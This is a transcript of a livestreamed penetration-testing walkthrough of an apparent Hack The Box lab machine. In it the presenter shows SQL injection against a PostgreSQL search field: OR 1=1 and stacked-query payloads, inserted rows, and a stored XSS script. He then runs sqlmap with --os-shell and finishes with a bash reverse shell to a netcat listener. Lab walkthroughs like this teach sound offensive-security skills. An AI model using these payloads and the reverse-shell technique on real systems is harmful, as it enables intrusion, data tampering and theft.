So here we see, we can see this a request. We see in the URL. If you can see in the URL bar here, let's do another Notepad stream. Okay. Our good friend Bobby Tables. Okay. So this website is communicating with a backend database. So this website, let's go back here. There is a backend database that contains all of this car information that this web server is communicating with to withdraw information from when we use this search field. Okay? It's using a language called SQL. Probably MySQL. Probably MySQL because this is a PHP web server. But it could be something else. We'll see. The request that broke the server was this. This was the URL that I sent. And you see I put in the search field, I put a single quote, an apostrophe. And we see, if you can't see this, I'll copy this out as well so you can see it properly. Error. Unterminated quoted string at or near single quote. Line 1, select star from cars where name like. So, not only are errors enabled, which is already bad enough. Already are errors enabled, which is already bad enough. But this error message is doing us the extensive courtesy of telling us exactly which database into which we are injecting, and what the query looks like into which we are injecting. The query looks like this. So this is in, again, a language called SQL, SQL. Structured Query Language, I think it stands for. Structured, some people say SQL, some people say SQL. As I've always said on this stream, the correct way to pronounce it, is however your boss pronounces it. Yeah. Select star from cars being the name of a table, where name like, I think I like is case insensitive like, and then we can take this out, and then there is a single quote here, and then it's expecting user input. So, this is a placeholder, by the way. This is not actually what the query looks like. This is a placeholder. Whatever we put in this search field, such as test, is going to end up right here. Test. It's actually all capitals. Test. Okay. So, why, pray tell, would a single quote cause a problem? Do you guys see why a single quote might cause a problem for this language? Because now there's an extra quote in there. SQL doesn't like that. This results in a syntax error. Because we terminated the string, but there's this other semicolon here that's not getting terminated. So, we could actually manipulate this by typing something like or 1 equals 1. And then we could just comment out the rest. Like that. So this is a comment. Like anything that comes after a comment will be completely ignored. So this quote will be ignored. So let's try this. Let's put this up here. Did I not copy it? No, there it is. And look, we don't get an error anymore. There's no error. And instead, we get all of the cars. We get all of the contents of the cars table. Because look at what we've done. We've manipulated. We did more than just put in this field, instead of putting test or something like the developers intended, we have manipulated the SQL query itself. Instead, we've terminated the string, so this name like nothing, and we put a conditional in here. We said, or 1 is equal to 1. So it's going to go to every entry in this database, and it's going to ask, hey, is the name of this car like nothing? Is the name of this car like nothing? Or is the number 1 equal to the number 1? And obviously the number 1 is always equal to the number 1. So it's going to include that in the results. And it's going to do that with every single entry on this database. So we have dumped the entire contents of this database. And what if we change this conditional to something that isn't true? What's going to happen then? If I change this to 1 equals 2, what's going to happen then? What's going to happen then? Okay, well, it jebaited me because... Okay, well, it jebaited me. I don't know why it's returning all of this. It shouldn't return anything. It shouldn't return anything, I would think. I would maybe put test or 1 equals 2. There we go. So we just had to put something in the field. We just had to put something in the field. So we put test in here. Test. And then we close the single quote. And then we tack on there just had to be something in here. Okay? So now it's going to check. And this has to be 1 equals 2. So now, since none of the cars are named test, and 1 is not equal to 2, it's not going to return anything. We don't get anything returned. Excellent. So this is the essence of little Bobby tables. This is called SQL injection. We call it Bobby tables on this stream. I have exploited SQL injection many, many times on this stream, both manually and using automated tools. If you would like to see the automated, or if you'd like to see the manual, I encourage you to go back and watch. I think it was probably last week. Last week or the week before, I feel like we did a manual SQL injection. It was not long ago. Today, I'm going to use SQL map. Today, we're going to use SQL map because I didn't show off SQL map last time. You're right. You did do a poll. And the manual won out just barely, but we did the automated, we've done the manual. We're gonna do the automated this time. We're gonna do the automated this time because SQL map is fucking pog. Not from Quetta is correct. Oh, automated one. Oh, okay, my bad. I wasn't paying close enough attention then. I tried to explain. Look, why Bobby tables? Because of this. Bobby tables, XKCD. Classic XKCD right here. There we go. Classic XKCD. Little Bobby Tables, we call him. Our good friend, Little Bobby Tables. So, if you still don't get the joke, the joke is that this mother named her kid a SQL injection, a SQL injection input, only to, just to troll anyone who put his name into a database anytime. You can see look at the alt text. Her daughter's name helped. I'm trapped in a driver's license factory. Yeah. Yeah, that's the XKCD alt text is always good. Is always good. This is a classic XKCD. And yes, it is a meme on this channel. I will continue to call this. I've been calling SQL injection Bobby tables ever since I first learned how to do it. So, this is we will be exploiting little Bobby tables, okay? Little Bobby tables. Now, how do you can exploit SQL injection is an extremely severe vulnerability. I find it very commonly. Even in 2021, I'd say it's very common for me to find SQL injection vulnerabilities in the wild. Very, very common. Is SQLi still relevant? Absolutely it is. Absolutely it is. I have found it on live networks many, many, many times, especially on internal networks. Especially on internal networks, I have found SQL injection on custom internal web pages. Extremely common. Do you do bug bounties? Not anymore. I have in the past. And I've found them on on open to the internet as well. So SQL injection is not going away anytime soon. And if it is found in the specific nature, the severity of a SQL injection vulnerability is going to vary on a wide variety of factors. What database you're injecting into, what the nature of the injection is, what permissions the web application has. If it's running with database administrator privileges, you have a much more of a problem than if you don't. And we'll talk about that in a minute, I'm sure. Is it MS SQL? What query are you injecting into? A wide variety of things. The SQL injection can present itself in a wide variety of forms, and I often find it not necessarily on login pages. Oftentimes, admins harden their login pages. Like, I don't find it in logins or anything very often anymore. I typically find it in APIs, in backend APIs that they don't realize I can very easily find out about and access, like, on my own. That's most commonly where I find SQL injection. So there is an automated tool. You can exploit SQL injection manually. It tends to be very laborious. It tends to be quite laborious and frustrating. This one would probably be pretty easy because we're seeing the outputs of the SQL command. I've done it manually many times on this stream, at least 3 to 4 times now. I've done a SQL injections manually on this stream. Today we're going to use SQL Map. SQL Map is a Python tool, extremely powerful. Extremely powerful. I would say the majority of SQL injections I've found in the wild were exploited by SQL Map. SQL Map is so powerful that it's not allowed on the OSCP exam because it's OP. It's not allowed on any offensive security exams because it's just overpowered. It's just straight up OP. It's Demon Hunter on release in Hearthstone. That's SQL Hunter. That's SQL Map. Okay. It's Brigitte in Overwatch on release. That's SQL Map. Do you have an OSCP certification? Yes, I have OSCP and I have OSWE. The OSWE certification deals more strongly with SQL injection. OSWE had several modules that were focused on advanced SQL injections that required custom scripts to exploit. So if you really want to know, if you really want to be a master of little Bobby tables, I do recommend OSWE, the Offensive Security Web Expert certification. So we are going to use extremely powerful SQL Map. So SQL Map, the easiest way to do this, let's look at here. Excuse me. I'm looking for one of our search queries. I did not set my scope, so we're seeing all this Google crap, which I normally don't like to see. but that's okay. Right here, this one will do. So we do see this is one of our requests to search, and if we send this over to the repeater tab, we can send this request, and we can see the results over here, the raw HTML of the results. And then we can send like a sample SQL injection query and send that. And here we can see the error text here at the bottom. So let's hit back. Now let us right click on this in Burp, and we are going to copy to file. Now there's another way to do this, and I'm going to point that out as well. Yeah, that was the proper I was working on. We're going to copy this to, what was it, starting point that I put it in? Here we go. I do need to clean this up. This is getting a little messy now. We'll call it search.request. Save. So you can also just do the URL. You can also, you don't have to save it like this. You could just copy this URL out and feed it to SQL Map, and SQL Map would exploit it for you. I like doing it this way with the request because post requests can't be done with the URL. Most SQL injections, in my experience, happen in post requests, not in URLs in the modern day. So this is the only way to do it with a post request. So this is the way I always do it. We can call it search.request. We're gonna call it level equals 5, tac risk equals 3, tac batch. So level equals 5 is gonna tell it like, hey, try everything, try all of your. We're probably not gonna need that actually. We can probably just crank that down a little bit. We'll just let it do the default. We're gonna set risk equal to 3 though. We're not concerned about getting caught here. We're not concerned about getting caught or anything, so we're just gonna about being loud or anything. So we put risk equals 3 just to have it run as quickly as possible. And tac batch, SQL Map a lot of times will ask us, you know, we can just probably remove that. Keep it simple as much as possible. We'll keep it simple. All right, so now we're gonna let SQL Map do the sorcery it's well known for. Tac risk equals 3. There we go. So SQL Map is now going to. SQL Map also notices that get parameters search might be vulnerable to cross-site scripting attacks. So SQL Map is so good that it's cluing us into the fact that this might be a cross-site scripting vulnerability as well. I don't think it's getting reflected on the page, obviously, but we can try it. Yeah, it's not getting reflected on the page except if the car, maybe it could be, we could do like Sandy script alert 1, do something like that. Now we still don't get it. It's whatever. No big deal. But SQL Map is trying to clue us into that it might be vulnerable to cross-site scripting as well. It looks like the back-end DBMS is PostgreSQL. Ooh. Not MySQL. Spicy. And we like PostgreSQL. Does anybody know why we like PostgreSQL? Why we like SQL injections into PostgreSQL? We don't like it as much as we like MSSQL. MSSQL, as we said in the trivia, has XPCMD shell. We don't have that in Postgres. But does anybody know what we do have? Does anybody know what we can do in Postgres that we can't do in MySQL? This is a wrinkly brain thing. If you're new, that's okay if you don't know this. This is a wrinkly brain thing. Wrinkly brain. Now, we're going to do tac OS shell. Don't worry. We're going to do OS shell. We're not there yet. We're not there yet. What do we I'm not talking about SQL Map here. What in general can Postgres do by default that MySQL cannot? The answer is stacked queries. The answer is stacked queries. So, what do I mean by stacked queries? I mean 2 queries in one. So, a stacked query would have a query like this, just to remove the injection, and then would have a semicolon to separate them, and then another query right after. Select star from users. Or something like that. So 2 queries executed as one. That is what is happening over here. That is what is happening here. This is a stacked query. Notice Robert close the string, terminate the parentheses, semicolon, drop table students. Drop table students is a separate SQL query. It is a stacked query. That's what you call it when you execute 2 queries in one. MySQL databases do not support stacked queries. You cannot do stacked queries in MySQL. However, in Postgres, you can. So, if I do something like, I don't know, test, close single quote, semicolon, select star from users. This is a complete shot in the fucking dark, by the way. I'm just assuming the users database is in there. And then we have to comment out the rest. Users is not... Okay, so there's no database named users. My point is that I could execute... If I do this, select star from cars. There you go. Notice we get no error here. Notice that no error occurs here. Now, we're not doing anything useful with it. Let me copy this out into the notepad so you can see. I can't make it any bigger in the URL bar. But let's copy it in here so you can see. Test, semicolon, space. It doesn't even need to be a space, but we'll put it there just to make it easier to read. Select star from cars, and then a comment. So do you see how we chained another response? We chained another query to the first one. We chained another query to the first one. Okay? Yeah, we could try PG tables as well. PG underscore tables like this. Looky there! What has happened here, chat? What madness? What cosmic, eldritch madness have we wrought on this Postgres database? This is showing us every database. Why? Because the PG underscore tables database contains all of the names of all of the table names, or not the database. It's the table. The PG tables table contains all the names of the other tables in the database. So it's a meta table. It's a table about tables. It's a table containing information about the other tables in the database. So we have chained this query onto the end of the previous one. And as a result, we have done all that stuff. Now, you might say, but on MySQL, you can do something like a union select. You can do you can do a union select as well. You might be able to do this here as well. So let's try test union select star from PG tables. Same number of columns. We don't know the number of columns. It's okay. It would still work. Just trust me on this. The union select would also still work. Okay? So the difference here is we can do other stuff. In a union select query, you can only do select. You only have select. But with a stacked query, you have so much more power because you can insert or you can drop like Bobby Tables. You could put, if there's like authentication happening here, if this database is up, we could put a new car in. We could like insert into cars. Let's get a bait. I just to prove a point here. I do want to do this just to prove a point. Postgres insert into example. I just want to see an example of inserting data. Insert into cars, column 1, column 2. Okay. So how many columns are there? Name, type, fuel, and engine. So we can into cars like this. And then it is a comma separated sort of array here. So Cthulhu, Fountain, KEKW, and Robert. There you go. We'll put those in there. So that should do it. Let's copy that. Let's paste this up in here. Car's name. Okay, what did the error say? I need to read the whole error. Does anyone know what the issue is with my column names and then values? I must have... Okay, cars were named like test, insert into... What did I forget? Insert into cars. It must be cars lowercased. Did I get this right? I think it needs the column names, not the values. Column names first, then the values. Oh, okay. So we put the column names first. So the column names are going to be whatever there are on here. So name. So the column name is going to be name. And then it's going to be like this. Column name. I didn't properly read the example, did I? Yeah, I didn't properly. So this is another example of read the fucking manual, idiot. So we have the column names and then values. Okay, yeah. Okay, so column names, name. We're kind of just assuming we could figure out the exact names of these columns. But I'm assuming that's name, type, fuel, and engine, values. And then is it just another parentheses array here? Yes. So let's do that. Cthulhu. Fatagan. Robert. KEKW. There we go. Let's try that. I still get a syntax error. Let's see. Let's take a look. Yeah, it's probably capitalized or something. What's the name of the columns? Is it PG underscore columns? No quotes around column names? Okay. We'll do stream raiders here in just a second. Type, fuel, engine. Let's try that. I could, after this, if this doesn't work, I'll extract the column names. I think it's PG underscore columns. Column fuel of relation cars does not exist. Okay, so what's the, is it... select star from PG underscore columns. That does not exist either. He is obsessed. I'm trying to teach you something new. We haven't done this before. This is the first time. Normally, we're injecting into a MySQL database, so I don't get to do cool shit like this. I get to do a cool thing right now. Yeah, I want to do this. I want to do a cool thing. I want to show you what's possible with stacked queries. This is valuable. So Postgres injection, find column names. Oracle is a different kind of database that I've never actually injected into in the real world. How do you find the column names? Postgres injection cheat sheet. Select star from table name where false. Database contents, conditional errors, time delays. String concat, that doesn't work either. Case sensitive. It's probably case sensitive, right? I'm just looking for a quick way to extract the... Postgres query to find table column names. Select column name. Select column name from information schema.columns where table name equals cars. Perfect. Do that. Let's do select column name from information schema.columns where table name is equal to some table. Table name is going to be equal to cars. Let's try that. I just want to get the column names of the cars table, so I don't have to keep fucking around with this, these column names. God damn it. I can't believe he doesn't know the golden statement. What's the golden statement? What are you talking about? If you're adding values for all the columns of the table, you don't need to specify the column name. See, that's a valuable thing to say. That's a wrinkly brain thing, Sabertees. Thank you very much. Insert into cars values like that. Again, wrinkly brain. That's helpful. Wrinkly brain. We still get a fucking error. Remove the single quote. What single quote? Where? That single quote has to be there. Describe cars? Okay. Let's try that. That doesn't work either. That doesn't work either. Maybe not all the columns are varchars. Semicolon. There doesn't need to be a semicolon at the end here. There doesn't have to be a semicolon at the end here. First column is an ID. Try hacker. Look, I'm trying here. I'm just trying to get the column names. I can't seem to get the column names. Here we go. This is what I want. See, this is what I did, where table schema equals your schema. The first column's an integer. How do you know this? Is it in the error message? It's in the error message, isn't it? So the first column is probably ID. I agree with that. But I just want to get... This is why I want to get all of the... I get that. I understand that, chat. Chat, I understand. I understand that we might not have all the columns. It's not about reading the errors. I'm trying to get all the column names. Like, so that I don't have to guess. I'm trying to get all of the column names so I don't have to guess. Okay, I'll try that, Ghost. I'll try that. Table catalog, table schema, table name. Are you sure this works for Postgres? I'm not sure that information schema works for Postgres, but we can try it. There does need to be a comment at the end. Yeah, it doesn't work either. Was missing your information schema attempt was missing the comment at the end? Oh, I was missing the comments at the end. Good call. Oh, and I put 2 tests in here. I'm just all over the fucking place, dude. This is what happens when you do this manually for too long. You start making stupid mistakes like that. Okay, this at least did not return an error. This did not return an error. But unfortunately, we don't get any column names. Damn it. Okay, you know what? You know what? You know what? You know what? Okay. Insert into cars. We know that name is correct. We know that name is correct. So name values Cthulhu. So the Cthulhu car. And that still is wrong. God damn it, dude. At or near name. Oh, the column name doesn't need a fucking quotes. We've already been over this. Car's name. God damn it. Null value in column type violates not null constraint. Oh, this is perfect. Okay, it's giving us... So there's an ID... Okay, all right, cool. This gives us something. This gives us something to work with. I'll turn my music back on here in a second. All right, so how many of these are there? 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11. So it needs to be 11. Okay, so the first column, it's probably 5 columns, and one of them is an ID. The rest are strings. So test, select, or insert into cars I'm guessing ID name and then what's the rest? Type, fuel, and engine. Type, fuel, engine, values, 11, then the first Cthulhu, Fatagan, Robert, and then KEKW is what we went with. Okay, so we have ID, name type, fuel engine values, and we need that. Maybe this will finally be the thing that does it. We put the single quotes around. We did the single quotes. Paste that in. God damn it. Okay. This is kind of just what SQL injection is like. This is just the real world of SQL injection. Fuel of relation cars does not exist. Okay, so we don't have to, let's just try not putting the column names. Let's just do that. Just try not putting the column names. Copy that. Paste that in. Come on, you bastard. Yes! We don't get an error. We don't get an error. So what happens when I search for Cthulhu? Fucking bam, kids! Fucking bam! We have inserted values into this database. Why is this relevant? Why do I show you this? Why do I show you this? Why do I show you this, chat? I show you this because many times authentication is done using databases. Many times authentication is done using databases. If that is the case and you can execute stacked queries like this, you can insert your own values into the authentication. So you can make your own user account, and you can probably make it an administrator too if you want. There is value in knowing how to insert values into this database. Let's do it again. Let's do it again. Why stop here? Why stop here? 12 XSS cross-site scripting script alert 1 script. Five head wrinkly. Excellent. Let's see what this does. Just, purely arbitrarily. Looky there. We do not get an error. So let's search for XSS. And what has occurred? What has happened? Stored cross-site scripting. So we have executed a very simple JavaScript payload as well. Very simple JavaScript payload as well. If you weren't aroused before, you should be aroused now. Okay? Excellent. Excellent. So we did not do, what can you do with this stored cross-site scripting? Honestly, probably nothing. Probably nothing that the SQL injection won't just give you. Like a shell on the target, for instance. But the cross-site scripting is still a good thing to point out to the client. Like say, hey, I was able to insert these values into the database that allowed me to execute arbitrary JavaScript in the browsers of your users. So using this, you could do things like steal their session information. You could do things like keylog them to steal their credentials. You could do things like hijack their session to perform requests on their behalf. You could display fake forms and all kinds of shit. There's all kinds of mayhem that you could perform with this. But if your goal is to get a shell on the target machine, chances are the SQL injection is going to do that for you anyways in cross-site scripting. Cross-site scripting in some cases can be leveraged to get a shell eventually, but usually not without chaining it with other exploits down the line. But this would still be good to point out to a client, which is why I bring this up. I bring this up because this is still valuable to point out to a client. It's valuable to point out literal that you can gain that you can execute JavaScript in the browsers of their challenges. Is this a HacktheBox challenge or something? It is, but we're going above and beyond. This is HacktheBox's starting point, the vaccine box, I believe. But we're going above and beyond and learning how to insert values into the database. We've inserted. Notice that the cross-site scripting payload does not appear here, and that's because it's being interpreted as HTML. It's being interpreted as HTML. And I can show you that if we go to inspect element. Right here. So this is the JavaScript. This is the HTML of the page. And look, this is our payload. But see that it's in its own little script tags here. This is being interpreted by my browser, my Firefox browser, as HTML. That's why it's executing JavaScript. All it's doing is showing an alert box. But I could do a wide variety of different things here. Let's do a Stream Raiders battle really quick. We're behind on that. Alrighty. So, I think we have adequately demonstrated this this payload here. And now, by the way, every single time we browse to the main page of this website, it's now going to show our cross-site scripting payload. We do see our custom cars in here down at the bottom. So, let's just continue. It looks like the backend DBMS is Postgres. So we're going to continue with SQL map. For the minute, do you want to include all tests for PostgreSQL? Yes. Okay, there we go. PostgreSQL and error-based where having clause injectable. So it has determined. It's also finding the stacked queries. Notice that PostgreSQL is also noting that there are stacked queries available. Because SQL map is a fucking hoss. All right, so now we see that SQL map has finished. It's finished evaluating the target. It's seen that the backend DBMS is PostgreSQL. SQL map has a backend database, so it will remember things that it's tested in the past. So now we just want to run it again with the same request, and we can just ask it, hey, give me the DBMS, the databases. No, give me the databases. TAC databases. No, it's TAC DBMS. I had it right the first time. DBMS. What is it? DBS. DBS, yeah. I always forget that one. All right. So now, SQL map is going to do us the courtesy of retrieving all the database names. We do see information schema. We see PG catalog, and we see public. Public sounds interesting. So let's do TAC capital D to specify we want to work in the public database. Choose public. And then we want to see what tables are in there. So TAC tables. Perfect. So there's just one table, cars. There's just one table. Feels bad, man. No users table containing user passwords and things like that. That's okay, though, because I think we probably have enough to get a shell anyways. Probably. And we can attempt that. And our good friend SQL map. Oh, but I can show off dump as well. So we can do TAC cars. TAC dump. And this is going to dump everything in table cars. TAC cars, not TAC T. TAC dump will dump the entire contents of table cars. You see it? You can see it. Here's our cross-site scripting payload. We do see that the first one was, it looks like the fuel column was in fact called fuel type. Yeah, there, so that resolves that issue for us. So now we're bored with all of this, so why don't we just try tac os tac shell? What do you think that does? And just like that, we're able to execute commands on the target system. Not just SQL queries, operating system level commands. What is this std out? It had to retrieve the std out one character at a time, and it looks like it wasn't formatting it very well. It's in a Linux OS shell, it looks like. Going to use copy from program command execution. So this is a Postgres specific thing. What is this fucking black magic you're doing, sir? This is just SQL map, my dude. This is just SQL map on an average day. For you, this is black magic. For SQL map, this is a fucking Tuesday, my friends. For SQL map, this is a goddamn Tuesday. I'm telling you, SQL map is over fucking powered, my dude. It is so fucking good. This is one of the most effective tools I have ever used in pen testing. It is so fucking good. I can't believe it. It's free. It's so good. It's one of those tools that's so good. I can't believe it's free. And believe it or not, yeah, especially with tamper scripts. Wink, wink, nudge, nudge, psycho. Wink, wink, nudge, nudge. So we're not satisfied with this shitty command output, so we can actually fix that. Just have it listen. So we're going to listen on this. We're going to start a netcat listener, so it's going to listen for connections on port 8443. We're going to head back here. We're going to go to payloads all the things. Excuse me. Bash TCP. This thing right here. Bin bash tac C, bash tac I. What's my IP address? If config, it's on 0. 10.10.14.18. 14. 18. 8443. Okay. It's going to execute that. We don't need the output. And look, it's hanging. Does anybody know why SQL map would be hanging? I know why. Because we have a shell over here. SQL map is going to hang until we get a shell. So we have, what this command has done here is it has connected back to us on the port that we specified, port 8443. This is my IP address. This is the port that I specified the listener on, and it's opened us a bash shell so that we can execute commands on this target system, which means
Hacker man.
I'm in. So we're in, boys. Okay, we're in here.